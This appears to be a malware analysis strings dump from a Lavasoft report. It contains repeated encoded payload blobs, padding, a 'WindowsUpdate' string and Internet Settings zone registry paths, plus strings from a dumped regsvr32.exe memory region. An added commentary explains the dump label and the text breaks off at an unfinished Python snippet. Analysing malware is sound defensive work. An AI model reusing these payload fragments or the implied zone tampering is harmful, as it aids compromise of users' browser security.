Ri8aXf8RMS9kwfLTePGA5cuunQIGdwDTg8lIk/aZfb4sEEVIQPLYbEXRLF0omAUxRTG Q9FiJ3iyff6qj4Gkkv9KX3N4Kot06WGnxXEch6JUbLjZ45/YS2dzdkUCIxvHdarUDHHI3JMMqO7K7IBd01EpbB0PxbC61Td78MNiPzB/jZF6rqs4zDkZGanDTyBM52sPH8XYqbKPlXjlHL6Kw5EGq voGi4L8MDWckJ1VqrTHGFwQ4PBUl8l4HkJUoCFCjkoFryvMUUvx1oqSn3Q9/ON22eEEnrro3n32sIelEIWE 1vmKGuDcaLtKkLDsmzy lINg9/yvNr94D7VIUk8fqg5 Mw0GB8h33z yJ3scmf0ZRdHqXPSwkmODEwxPFFgRxKXR TvpDX4Knb7UjKOL5scgBEg1QVHi5QZ6BsE68J3A1LrJEzFMuI8wMNoHwEbvvW/FJGqkpegyHDt trwOd2IItS5EnuHI2d/uzQh5VHnBSk4JSTmE0u6xOjsFhutAT WmdoZXJYPll4Bh4H6ucjO AYjAViCZirXzcqmB l537VJM3zXLBGQfTTbOXB3PsSCYQ8W7MZSmZZkSCrm9SQmoYOG8Crds37EqviX UdKDkOXHUVvNkJfS6mUUVVvgwADFwOqPY K8 rp jg3LOIIfFjKAm6nW6xaETjRGPjPh522JndLpuBUZtjFRDsJ8lZSb5AN0MSFql oCchNTpo462Bqr84mG/jPhbz31a6OWiVs3GxLQZWUZEaqeI8FHrQMyfqBBJcHw47obOrkzdjyznzRXUSE rpEswADU9bDqGaiQwnfeazZAVGNXCSlnJqnv2QcGkhBNLPtDm1YhZJU4TzIUHmGRKdjvCKWCwCtq9d63MyCG17et0oR5g8 vFtX7jDL02EB/G9O59jFieuGpzJE3WBRHUOQqCEMEk0UCP/Lxr5RGPNrDNXHduPbrmof660edbyazSZtjjA/fbiCplKhzitPQZRzWCktoKKc7pcc2mvFcjT3tUVbSYfC75 O1G5Zg42AN9GAPyRhn5rk9rIvCjruUHEi4dY4kAtqWdOcjHL5fqpfajiyO/RXfgrC0AfhoiGemP2JnB960j9oagiSfZ3VxHhJLj37GppNYL1/89ueXoh5Vy8 lTJiEoYmGGlAl88KHUZuTXFpYT1Z4pXwrnkI1DVL0FGs5NdOGyeAKbo9Xs8aaxYTujku558nD2FwnA8IbBi/67WT7RAWsSKtkL7lwOLlXQvtYpwBTQWZGFtkrPjcl90DK3mSP7oPWaH9BX4iKhz22JFaLEdNiv Czh4Jqttes3oX5OJRCdws0qp2Use97 oZKC0dHxN c2O3ESpZEBDbH0bVRUzaGsrIxNiMCa/5tsuAQ0LNTWXOP OsgpRnhkJCRZmPVSrBRVpZcKv7kkxzJjw551n71u2Y66AqpnTGKkOLL6FaRYDOjKEFvzerH4etYGKb/jjwmddy UzY4Z7ws6AhGJNW1kcn A5ytg4s7ePRSHrJ0HK1sIw/E1cefkAxp0RryFmuzjMFBFOvc09 QIrPWZAEycm56xakGU9qcxMbjK9xH2rsR9wF6Qjv6LH6FNU4PsUPsJUE5D3GHahvJZd8MDR7I fIgJ8Y6i8R7Iw4cTZzdcp3rH/gGylGwtuYK zpQFPnJs6TxJVhgwDVeibDGT cmuqdt9nGnKay8OB1/ mDjsWs47ndexRZydsatmD05dCuRDDzbKRKYD16WR4DvdPOYNy7OXo990c1pmWCrBs/pF6fd6 KBui54jz6ufiSsN1ZbqIXzMCGlhd0PkM4FgyGrQaE6b gMMDLeoDBR4qIWoBVY/Ozl2Vzd5Zi4dZ6hjc28f8F/1KoyfS4V NtDR0uEcsuU6I2q1naokDAFPfiFV YRhBVNZiYzVCnqBV2kyWO/paeIb7H/2ZKIvSDkVTWaNvbE0089Q59Kj5R 
byL6Y9H1ciLdE38IKeWjQa9fPSRlJyvpQMS0AbX4RPvo2tIhk3Lm5c17JUOK3OGbShzt8YHIrt/9a4slvfxs7os3bg6jJax97rJqVRUFuWJ20ML1 K0yeV2wMayqZrFghV/2ycUtga7fgZVih20wz90ev4EMxyWnR/I zdEDL1PwKvjn2ReeUtzL OFyzn8cVqSQTjMD08oAmH0UNEFQlfwkkwM9X4YMrPqryUOc1RaYxgQ7z0YrY/kGk lic5r E1Ffkn9Ft5xT89i860r3D0M5BlnRdFcTZETH18mUVAnVoZLvbxWRTqDWgwr42Z XVj khzcfvUisqAPQfOiM77oUXcOxiRyfHcmmirIvBpL3zt LpmLZrGE81V5uTgklyT/PpQVbokkPIhThIqvbuDH1x77tz8qVgq62kuCcQQ8C9 pZfvUhaE7k5ZrK7SpO0CI8XSCcRBz3AFeFiQm1 iMbaL1nyAgL/xF76iP9FxTUJmXwYCWaauG  MrhELjoIDyUOztQ/Ws8 vXqYvX98cJyozEweWuTUNc7q5 p0 ESCmgrhIL/30f2rmzMrFDQAASJ4qk2YFkv1drFC /sAt7uxYhRW92OoqlHLFxH/sIqbzDQKHPGSMeulQKMHkPcOtgoqXWfQkrqIN2bDYhepdM2hO4ZH5Eoe/N/l8FYKN7KkWD2Tvx9d8byLNtQdA3c0oqzomgHkJA6sIJHtpi2LaBJ8HP7Un3guca1i9QMf6F4ynOMKYWyhxrm/82Hj/oiz/3liv/nqFiT P7eMhERpSgfS7uS/z3BECYrVJ3hnZDLpHLO15vz51DxfMRxpcbMAqeuOPaRZik73V6xXAzAFigj 1/ncX/9Bh9nFc9tSOx6em4K3 TxyoJrceU3l5JHTHMi6F l94mKNms876z9Dw041eivZ4AhUc6L0ViVB1ADIvxpMLy3T2/6Nb/sd1JWUUClB4ZZnt5ci4V/fk8h1pu7yJS9GsDfLUeCFv6uaPeUejmkwr2c b9IANOzgTOthCq/h2D4y5VlT8G1DpCeW0Qa33UYDCNwGlNHR/FWlX brwy3/tuc7ZfyO2PHKhRqFZeoTKkTXDuRqWsn4N8PqcD6 eNfscByikOu4z8 ey6LTQTUs0cst/gsbKTMdL6kfU5ORnXvpIYMJ/rDjEsMFZUUPa/dEZTfjccu46nMwLeFv/1Sy8tGQ0dgg0nGO/vDFgbWr7wu0seEjMN1xUFWgi7tq7CyRyLlhoLQvEq1j EMrtOI5hewB/mRZt06vQf77g9thV5EfCoWndVJAG11w0c23VSRQN2PTF5PKzLoxFxw 7sIVb viYqIRAipaM9QxtsNp9cSZ2qgPz5Xj3gRUaWXNv3tSwJDrGh5D2LBwfHK8frl7HcjmHFsfyrm0veNQFbgdw2ZIHazOO4ViboztG2jfL0tBwGppzj4sKFOBfyuz4w3RSFA3rCg4v4U3OeHcrXPxU1aYEloC2l9XAfl0lGQ0Jw8XlrNg2EWRcQd3OWWtEgrgWNo9gj8qVdIjVBEjQMvEXX8vjc/rC1gnnSExia2Y1cYA5kiQXIh8Saq2VED/JYoGSFcMr/XW1uynACuIH1Wm91idx8Ef04zh3XfdPkOcis7grQBfMImJiRH4xZ eO4ob6t530/KfIqg4SsXq 2D8ZmqGlmqqDXJt2S3BJ8aB8UEbOPglsRxPqYmjTropdtatNLos3H4KZAXXkYoxColKlcYHomawGrnYtHVOSDneHPEZtZOQoMygjQZDcoYJyGNpR2Qu8O7hpZW hGBnYksL0ufm6lWBGxrXGKPFGvhyIxOQTglytxFMZXun1HG28HLol8i jKH6F bsjbEaKA j2jSoTEm6btw0YhQHDq99miSNcI7JZggdLne4fhlI9Ctx98/pNSiTm6 CkMkCZM8lslDn3EnBO5BHyqeIi4BH3cUxTiP7 
GUHPY9sk12DiAPXbxwfrA8ZgmNpt4jNa1NNtBmQXyJS0Q75tyJWLmFYKlglvUvEFuSep6bRmdDzgFFYQp7dKOtkBYlDQJkDX/enOXvw1kZRBCha6lsKWGahfwB/naILsjBPvwyYWjOhz9r7C jXuKp4a/aUKSsSR1oxQUAdFOyEev72353m3gGFEO9DCrpP2Nb4yT5rcFqu/70fFNvYrWXlaQQthYOAme  hxa0XUObi/NkSC1Q2PKMIcd4iUWqyjYI8k1VEXBaRNWfDu5zge2wGs5RpoXItVVVcc9Tdhf/kpAO/sDMCifGexXijM98l3PfCc374P8xIOJNAN2Zw4uY7CcsBhdI7Q2SoH9OeBrt/Wtz678mj0riAQcmbLWhFirT1nPAAWID6TCqc780BMIamCWei8phZsWuBeaAFe5arKa78IJX6qhOxV/I8RaE/ZQSRo72nxwXeHogMe9u49s8SUHlTDcfFqD6ZK/Bf9mrm9kqNZ6V0vwR9RTCTp3zIaOqOUWlf384AqE sgCgb9iCSJqF0z/P959UQMwzXAv359FKElIL8mboFK5LGOuOfgwzgNeuy8fLwmvYOMRSJ1rZSOd1X5EhO5JNncoGR7noLGk2wF/J28K/AHd3Pinn7QYCO9qbbjEdeQqzb9L3Wgui13frEV8iF7QuMgmPUJL8cuarMGgCjA1U6asICK3agxVTWFrPGDos1JiNGOHmvGZcJd3D/OzTAWVPOhFrNzImt NkHeYvzMW 2cZR1V9XunTIpbz/pIDhYfwF/2Yi2x6uAVkfderH0ynXLQiJ u5bV9ENvCX2VpCoZ y9dp//ejqqCqybHfmQp/6fRbSn lNab7wsZbRAJeePIkSamofgjeW8xaGbu5ZpUwd/k0 uTKRNPESqiAZYmPd2RU2YLUyqCCEMkZmJ75gBxnzFK7GKgQlZU9XxC24fnPp6P19g6qhEEt2qkX0Oe6fNCNWfMO7NJE2dfZ25/q1mJPqjXThahO5L5iEzxA8es68rYDlmwWg0M0Gk0 mv4UaTRDoodSnCcpIDoDjYFC3aV1T7aTleoulDVEEyG3GxfCJsKHLa1X9 OIWYoWj1ArTpZJBE6IM6j5mJkcKmLLOkgrOrC309HqgcgK3e 9 3QJTZU4d VUTOCwoP MXuTukSSrsPXQqjdzb53WbWvl5jyRzdvnDVS9NzLlE5Z124JPXMHexvxWSGT8AhV4vW5QgpptPa8cFeWEKgk97fZMfBw67azErFcI/MUddVNCdw0Ou0Rg8FKTr6xdFYbbcvz/vDlZiCivyMMiO8pqmUvNbhvNsvQxaoBdy JSvkZVpHdnuKynqdpk0WQVZWOe61L2gujDC7TqvQoVbkAYchdRj7kPSTJIO2VD/LFNOFqbqErHSeChexIsip3WnFOKmSU P9pAoqiJLEbeFcKVlf07Yofh7YL AVmm/98v1b80TpVa8FGWpAMNYR64q6CtJcNZtl1W3UKTg96SNgIRNWiAl0A58z6WJ/z2w6OjZ11LzW42S1CUGB9fDa5Y4GAR7h540Ar0bCcUpB5uDke4j0UM/ K EiFayNrGODZ5Fq8ELzd4ULA3dyVAIjATjlkWWeviHV1TId4HKX2m0Hp7Kt4VEi8Ho iFqXqr2k78zm0ot6cUGzgQhejjtD0T09MLSXrq2TeQES7sYuL7cCh19QYnaAAE2WKStO1GZSX0GIuR5f89Jopioia9cWra7JgaUSxMVoCVV4ZgdeD0Z8awr4eAFLXykq0ZIA74fGw23ksGG23BgHse2Je7giklzfkX4lom  75p4DSLQ4iaXoVVfJRLhFWDtEZLRjcIs6ic4vMFyWDtTLUvrRUu0drG0g7JS0Wvt4C9j64ZdNtBHBH3NBrR8BDMr/xNopTTCrgan5nUHmKfM/9 44mydjXU 5DLj6Yof1fdwCt7fJHICfmkZmDYDypf0Jx GDQWVhlmcjH7TiE65ScvxU6q cXSQSPb4 
YyGImz/0QvYpQUyo1Q6H0oClSVMoFtVGvyXkSIm/zK8WLUw5Wjq1svMZP0v4I5VsrscNoNhPhu1st5p2UbPOirYjsdN6/CmZgvPL1oZz3Uc4nVHclToDm3tGULLDPyi7BhT9Z7mAyF/4rxZ5PbGJsdjCRb Sdf4iouWu1BWga14VyWaATnVM/eDni6lMNHdKx/mzjHz26YiqNQ8EMIyHm64fSN8MpEuDK9AV1I5vzt2Sr7q594DRt6LeJEczAdahziQqzXuQEJCXQiRt9ykAK0IgScih8IKR15PsyrUNN KWBpz7KNRpRUcjH84MKOo5Bc mszoLo/mcbbx00Uk4oP4WueHMR3iQOUHV01zjEAaOlwiEgbQyeW9h7pC43BHugPTwIMUpWEAxcPzdqV96nnZof2ckXniIurMEszerxKZQvhf0rjHCwsADh1/YqZOcu2Is vVsmZDqbID/LPNMHv49ePaEP1t3yd0uHdqlO3NnGFAXPpqMK7V4w1V6a PsaEchOac8I/S JLWKNn9CroMhyWiXMpK3RpnEH1F2gq3IjD5A7x/hLRzjXsnnlRx7x/3A0FpxYtaUCJabufXxuviuEf1DOtUTWc9Wr2UrNBYM7DFNSLCxHZcJia1lgd5C1edP/kieQhkc NJYm19rrk VmoDhQ5o VKFEfpfbODG m 9hiG3XGrLTFOyD2poOudhV2MXnSRut/jCc/RVxkKj8mzhTi1 IOoQHopYwbdrbMtN0aqrN1gp6HWaNm4pfWzfKrobU4qX6UQm2ceiTzaC8VNQoEX6Y4ACHu7gBvSf6/Xh cNXKIGydZ3TSUlQt1NuCd8PLe5535THWB2smI Lb nxKYgRi/tpxiNp6cvbvyQLpHqwPI6oGNFczLcWffb8gaJHRYuzx47AWT DSmy8VwHr4PZJzgdP0AKXVtsPJGyggPWLA/0wUS6WG2TmQHSXcgKlpr7Uf8CDBY0CiteleSNh3ZE0CuY wOFuQpw0hW4w34yypzZVsx9y5i0teholLN9B4KU3KtGtT21M xDvlH5oapAVgyX6v4zpzLoxpPSXZYf GQtlyokLrmhEDg0kWvwKZAPOpbl 2T8G2Ae9o3p1y/lAL/Z6LbUVCeMVJQXr5Hpqwu IrKzZRz1V/ Oer1z0HbaTZmLPi1zQaPCDVPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
UhwEB
Uhû
Uh'%C
Uh,
Uh1%D
Ri8aXf8RMS9kwfLTePGA5cuunQIGdwDTg8lIk/aZfb4sEEVIQPLYbEXRLF0omAUxRTG Q9FiJ3iyff6qj4Gkkv9KX3N4Kot06WGnxXEch6JUbLjZ45/YS2dzdkUCIxvHdarUDHHI3JMMqO7K7IBd01EpbB0PxbC61Td78MNiPzB/jZF6rqs4zDkZGanDTyBM52sPH8XYqbKPlXjlHL6Kw5EGq voGi4L8MDWckJ1VqrTHGFwQ4PBUl8l4HkJUoCFCjkoFryvMUUvx1oqSn3Q9/ON22eEEnrro3n32sIelEIWE 1vmKGuDcaLtKkLDsmzy lINg9/yvNr94D7VIUk8fqg5 Mw0GB8h33z yJ3scmf0ZRdHqXPSwkmODEwxPFFgRxKXR TvpDX4Knb7UjKOL5scgBEg1QVHi5QZ6BsE68J3A1LrJEzFMuI8wMNoHwEbvvW/FJGqkpegyHDt trwOd2IItS5EnuHI2d/uzQh5VHnBSk4JSTmE0u6xOjsFhutAT WmdoZXJYPll4Bh4H6ucjO AYjAViCZirXzcqmB l537VJM3zXLBGQfTTbOXB3PsSCYQ8W7MZSmZZkSCrm9SQmoYOG8Crds37EqviX UdKDkOXHUVvNkJfS6mUUVVvgwADFwOqPY K8 rp jg3LOIIfFjKAm6nW6xaETjRGPjPh522JndLpuBUZtjFRDsJ8lZSb5AN0MSFql oCchNTpo462Bqr84mG/jPhbz31a6OWiVs3GxLQZWUZEaqeI8FHrQMyfqBBJcHw47obOrkzdjyznzRXUSE rpEswADU9bDqGaiQwnfeazZAVGNXCSlnJqnv2QcGkhBNLPtDm1YhZJU4TzIUHmGRKdjvCKWCwCtq9d63MyCG17et0oR5g8 vFtX7jDL02EB/G9O59jFieuGpzJE3WBRHUOQqCEMEk0UCP/Lxr5RGPNrDNXHduPbrmof660edbyazSZtjjA/fbiCplKhzitPQZRzWCktoKKc7pcc2mvFcjT3tUVbSYfC75 O1G5Zg42AN9GAPyRhn5rk9rIvCjruUHEi4dY4kAtqWdOcjHL5fqpfajiyO/RXfgrC0AfhoiGemP2JnB960j9oagiSfZ3VxHhJLj37GppNYL1/89ueXoh5Vy8 lTJiEoYmGGlAl88KHUZuTXFpYT1Z4pXwrnkI1DVL0FGs5NdOGyeAKbo9Xs8aaxYTujku558nD2FwnA8IbBi/67WT7RAWsSKtkL7lwOLlXQvtYpwBTQWZGFtkrPjcl90DK3mSP7oPWaH9BX4iKhz22JFaLEdNiv Czh4Jqttes3oX5OJRCdws0qp2Use97 oZKC0dHxN c2O3ESpZEBDbH0bVRUzaGsrIxNiMCa/5tsuAQ0LNTWXOP OsgpRnhkJCRZmPVSrBRVpZcKv7kkxzJjw551n71u2Y66AqpnTGKkOLL6FaRYDOjKEFvzerH4etYGKb/jjwmddy UzY4Z7ws6AhGJNW1kcn A5ytg4s7ePRSHrJ0HK1sIw/E1cefkAxp0RryFmuzjMFBFOvc09 QIrPWZAEycm56xakGU9qcxMbjK9xH2rsR9wF6Qjv6LH6FNU4PsUPsJUE5D3GHahvJZd8MDR7I fIgJ8Y6i8R7Iw4cTZzdcp3rH/gGylGwtuYK zpQFPnJs6TxJVhgwDVeibDGT cmuqdt9nGnKay8OB1/ mDjsWs47ndexRZydsatmD05dCuRDDzbKRKYD16WR4DvdPOYNy7OXo990c1pmWCrBs/pF6fd6 KBui54jz6ufiSsN1ZbqIXzMCGlhd0PkM4FgyGrQaE6b gMMDLeoDBR4qIWoBVY/Ozl2Vzd5Zi4dZ6hjc28f8F/1KoyfS4V NtDR0uEcsuU6I2q1naokDAFPfiFV YRhBVNZiYzVCnqBV2kyWO/paeIb7H/2ZKIvSDkVTWaNvbE0089Q59Kj5R 
byL6Y9H1ciLdE38IKeWjQa9fPSRlJyvpQMS0AbX4RPvo2tIhk3Lm5c17JUOK3OGbShzt8YHIrt/9a4slvfxs7os3bg6jJax97rJqVRUFuWJ20ML1 K0yeV2wMayqZrFghV/2ycUtga7fgZVih20wz90ev4EMxyWnR/I zdEDL1PwKvjn2ReeUtzL OFyzn8cVqSQTjMD08oAmH0UNEFQlfwkkwM9X4YMrPqryUOc1RaYxgQ7z0YrY/kGk lic5r E1Ffkn9Ft5xT89i860r3D0M5BlnRdFcTZETH18mUVAnVoZLvbxWRTqDWgwr42Z XVj khzcfvUisqAPQfOiM77oUXcOxiRyfHcmmirIvBpL3zt LpmLZrGE81V5uTgklyT/PpQVbokkPIhThIqvbuDH1x77tz8qVgq62kuCcQQ8C9 pZfvUhaE7k5ZrK7SpO0CI8XSCcRBz3AFeFiQm1 iMbaL1nyAgL/xF76iP9FxTUJmXwYCWaauG  MrhELjoIDyUOztQ/Ws8 vXqYvX98cJyozEweWuTUNc7q5 p0 ESCmgrhIL/30f2rmzMrFDQAASJ4qk2YFkv1drFC /sAt7uxYhRW92OoqlHLFxH/sIqbzDQKHPGSMeulQKMHkPcOtgoqXWfQkrqIN2bDYhepdM2hO4ZH5Eoe/N/l8FYKN7KkWD2Tvx9d8byLNtQdA3c0oqzomgHkJA6sIJHtpi2LaBJ8HP7Un3guca1i9QMf6F4ynOMKYWyhxrm/82Hj/oiz/3liv/nqFiT P7eMhERpSgfS7uS/z3BECYrVJ3hnZDLpHLO15vz51DxfMRxpcbMAqeuOPaRZik73V6xXAzAFigj 1/ncX/9Bh9nFc9tSOx6em4K3 TxyoJrceU3l5JHTHMi6F l94mKNms876z9Dw041eivZ4AhUc6L0ViVB1ADIvxpMLy3T2/6Nb/sd1JWUUClB4ZZnt5ci4V/fk8h1pu7yJS9GsDfLUeCFv6uaPeUejmkwr2c b9IANOzgTOthCq/h2D4y5VlT8G1DpCeW0Qa33UYDCNwGlNHR/FWlX brwy3/tuc7ZfyO2PHKhRqFZeoTKkTXDuRqWsn4N8PqcD6 eNfscByikOu4z8 ey6LTQTUs0cst/gsbKTMdL6kfU5ORnXvpIYMJ/rDjEsMFZUUPa/dEZTfjccu46nMwLeFv/1Sy8tGQ0dgg0nGO/vDFgbWr7wu0seEjMN1xUFWgi7tq7CyRyLlhoLQvEq1j EMrtOI5hewB/mRZt06vQf77g9thV5EfCoWndVJAG11w0c23VSRQN2PTF5PKzLoxFxw 7sIVb viYqIRAipaM9QxtsNp9cSZ2qgPz5Xj3gRUaWXNv3tSwJDrGh5D2LBwfHK8frl7HcjmHFsfyrm0veNQFbgdw2ZIHazOO4ViboztG2jfL0tBwGppzj4sKFOBfyuz4w3RSFA3rCg4v4U3OeHcrXPxU1aYEloC2l9XAfl0lGQ0Jw8XlrNg2EWRcQd3OWWtEgrgWNo9gj8qVdIjVBEjQMvEXX8vjc/rC1gnnSExia2Y1cYA5kiQXIh8Saq2VED/JYoGSFcMr/XW1uynACuIH1Wm91idx8Ef04zh3XfdPkOcis7grQBfMImJiRH4xZ eO4ob6t530/KfIqg4SsXq 2D8ZmqGlmqqDXJt2S3BJ8aB8UEbOPglsRxPqYmjTropdtatNLos3H4KZAXXkYoxColKlcYHomawGrnYtHVOSDneHPEZtZOQoMygjQZDcoYJyGNpR2Qu8O7hpZW hGBnYksL0ufm6lWBGxrXGKPFGvhyIxOQTglytxFMZXun1HG28HLol8i jKH6F bsjbEaKA j2jSoTEm6btw0YhQHDq99miSNcI7JZggdLne4fhlI9Ctx98/pNSiTm6 CkMkCZM8lslDn3EnBO5BHyqeIi4BH3cUxTiP7 
GUHPY9sk12DiAPXbxwfrA8ZgmNpt4jNa1NNtBmQXyJS0Q75tyJWLmFYKlglvUvEFuSep6bRmdDzgFFYQp7dKOtkBYlDQJkDX/enOXvw1kZRBCha6lsKWGahfwB/naILsjBPvwyYWjOhz9r7C jXuKp4a/aUKSsSR1oxQUAdFOyEev72353m3gGFEO9DCrpP2Nb4yT5rcFqu/70fFNvYrWXlaQQthYOAme  hxa0XUObi/NkSC1Q2PKMIcd4iUWqyjYI8k1VEXBaRNWfDu5zge2wGs5RpoXItVVVcc9Tdhf/kpAO/sDMCifGexXijM98l3PfCc374P8xIOJNAN2Zw4uY7CcsBhdI7Q2SoH9OeBrt/Wtz678mj0riAQcmbLWhFirT1nPAAWID6TCqc780BMIamCWei8phZsWuBeaAFe5arKa78IJX6qhOxV/I8RaE/ZQSRo72nxwXeHogMe9u49s8SUHlTDcfFqD6ZK/Bf9mrm9kqNZ6V0vwR9RTCTp3zIaOqOUWlf384AqE sgCgb9iCSJqF0z/P959UQMwzXAv359FKElIL8mboFK5LGOuOfgwzgNeuy8fLwmvYOMRSJ1rZSOd1X5EhO5JNncoGR7noLGk2wF/J28K/AHd3Pinn7QYCO9qbbjEdeQqzb9L3Wgui13frEV8iF7QuMgmPUJL8cuarMGgCjA1U6asICK3agxVTWFrPGDos1JiNGOHmvGZcJd3D/OzTAWVPOhFrNzImt NkHeYvzMW 2cZR1V9XunTIpbz/pIDhYfwF/2Yi2x6uAVkfderH0ynXLQiJ u5bV9ENvCX2VpCoZ y9dp//ejqqCqybHfmQp/6fRbSn lNab7wsZbRAJeePIkSamofgjeW8xaGbu5ZpUwd/k0 uTKRNPESqiAZYmPd2RU2YLUyqCCEMkZmJ75gBxnzFK7GKgQlZU9XxC24fnPp6P19g6qhEEt2qkX0Oe6fNCNWfMO7NJE2dfZ25/q1mJPqjXThahO5L5iEzxA8es68rYDlmwWg0M0Gk0 mv4UaTRDoodSnCcpIDoDjYFC3aV1T7aTleoulDVEEyG3GxfCJsKHLa1X9 OIWYoWj1ArTpZJBE6IM6j5mJkcKmLLOkgrOrC309HqgcgK3e 9 3QJTZU4d VUTOCwoP MXuTukSSrsPXQqjdzb53WbWvl5jyRzdvnDVS9NzLlE5Z124JPXMHexvxWSGT8AhV4vW5QgpptPa8cFeWEKgk97fZMfBw67azErFcI/MUddVNCdw0Ou0Rg8FKTr6xdFYbbcvz/vDlZiCivyMMiO8pqmUvNbhvNsvQxaoBdy JSvkZVpHdnuKynqdpk0WQVZWOe61L2gujDC7TqvQoVbkAYchdRj7kPSTJIO2VD/LFNOFqbqErHSeChexIsip3WnFOKmSU P9pAoqiJLEbeFcKVlf07Yofh7YL AVmm/98v1b80TpVa8FGWpAMNYR64q6CtJcNZtl1W3UKTg96SNgIRNWiAl0A58z6WJ/z2w6OjZ11LzW42S1CUGB9fDa5Y4GAR7h540Ar0bCcUpB5uDke4j0UM/ K EiFayNrGODZ5Fq8ELzd4ULA3dyVAIjATjlkWWeviHV1TId4HKX2m0Hp7Kt4VEi8Ho iFqXqr2k78zm0ot6cUGzgQhejjtD0T09MLSXrq2TeQES7sYuL7cCh19QYnaAAE2WKStO1GZSX0GIuR5f89Jopioia9cWra7JgaUSxMVoCVV4ZgdeD0Z8awr4eAFLXykq0ZIA74fGw23ksGG23BgHse2Je7giklzfkX4lom  75p4DSLQ4iaXoVVfJRLhFWDtEZLRjcIs6ic4vMFyWDtTLUvrRUu0drG0g7JS0Wvt4C9j64ZdNtBHBH3NBrR8BDMr/xNopTTCrgan5nUHmKfM/9 44mydjXU 5DLj6Yof1fdwCt7fJHICfmkZmDYDypf0Jx GDQWVhlmcjH7TiE65ScvxU6q cXSQSPb4 
YyGImz/0QvYpQUyo1Q6H0oClSVMoFtVGvyXkSIm/zK8WLUw5Wjq1svMZP0v4I5VsrscNoNhPhu1st5p2UbPOirYjsdN6/CmZgvPL1oZz3Uc4nVHclToDm3tGULLDPyi7BhT9Z7mAyF/4rxZ5PbGJsdjCRb Sdf4iouWu1BWga14VyWaATnVM/eDni6lMNHdKx/mzjHz26YiqNQ8EMIyHm64fSN8MpEuDK9AV1I5vzt2Sr7q594DRt6LeJEczAdahziQqzXuQEJCXQiRt9ykAK0IgScih8IKR15PsyrUNN KWBpz7KNRpRUcjH84MKOo5Bc mszoLo/mcbbx00Uk4oP4WueHMR3iQOUHV01zjEAaOlwiEgbQyeW9h7pC43BHugPTwIMUpWEAxcPzdqV96nnZof2ckXniIurMEszerxKZQvhf0rjHCwsADh1/YqZOcu2Is vVsmZDqbID/LPNMHv49ePaEP1t3yd0uHdqlO3NnGFAXPpqMK7V4w1V6a PsaEchOac8I/S JLWKNn9CroMhyWiXMpK3RpnEH1F2gq3IjD5A7x/hLRzjXsnnlRx7x/3A0FpxYtaUCJabufXxuviuEf1DOtUTWc9Wr2UrNBYM7DFNSLCxHZcJia1lgd5C1edP/kieQhkc NJYm19rrk VmoDhQ5o VKFEfpfbODG m 9hiG3XGrLTFOyD2poOudhV2MXnSRut/jCc/RVxkKj8mzhTi1 IOoQHopYwbdrbMtN0aqrN1gp6HWaNm4pfWzfKrobU4qX6UQm2ceiTzaC8VNQoEX6Y4ACHu7gBvSf6/Xh cNXKIGydZ3TSUlQt1NuCd8PLe5535THWB2smI Lb nxKYgRi/tpxiNp6cvbvyQLpHqwPI6oGNFczLcWffb8gaJHRYuzx47AWT DSmy8VwHr4PZJzgdP0AKXVtsPJGyggPWLA/0wUS6WG2TmQHSXcgKlpr7Uf8CDBY0CiteleSNh3ZE0CuY wOFuQpw0hW4w34yypzZVsx9y5i0teholLN9B4KU3KtGtT21M xDvlH5oapAVgyX6v4zpzLoxpPSXZYf GQtlyokLrmhEDg0kWvwKZAPOpbl 2T8G2Ae9o3p1y/lAL/Z6LbUVCeMVJQXr5Hpqwu IrKzZRz1V/ Oer1z0HbaTZmLPi1zQaPCDVPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD1
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666

regsvr32.exe_928_rwx_01000000_00005000:

.text
`.data
.rsrc
msvcrt.dll
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
ole32.dll
regsvr32.pdb
_wcmdln
RegCloseKey
RegOpenKeyExW
Excessive # of DLL's on cmdline
5.1.2600.5512 (xpsp.080413-2105)
REGSVR32.EXE
Windows
Operating System
5.1.2600.5512
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall
Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.
LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.
%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.
OleUninitialize failed.["%1" is not an executable file and no registration
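The label regsvr32.exe_928_rwx_01000000_00005000 encodes the process image, the PID, the page protection and the hexadecimal base and size of the dumped region, so this is 0x5000 (20480) bytes starting at 0x01000000, the usual image base of Windows XP system executables. The strings under it (PE section names, regsvr32.pdb, the usage and error text) belong to regsvr32.exe's own image, so by themselves they show the executable, not injected code; the stray back-tick in "`.data" is the last byte (0x60) of the preceding section header's Characteristics value (0x60000020 for .text), which a strings scan glues onto the next section name. As an added example that is not part of the Lavasoft report, the Python below parses such a label and extracts both ASCII and UTF-16LE strings from a dumped buffer; the label layout is assumed from the label text, and SAMPLE_DUMP is a constructed stand-in for the real dump.

```python
"""Added example, not part of the Lavasoft report or of regsvr32.exe: reading
a dump label of the form <image>_<pid>_<protection>_<base>_<size> and pulling
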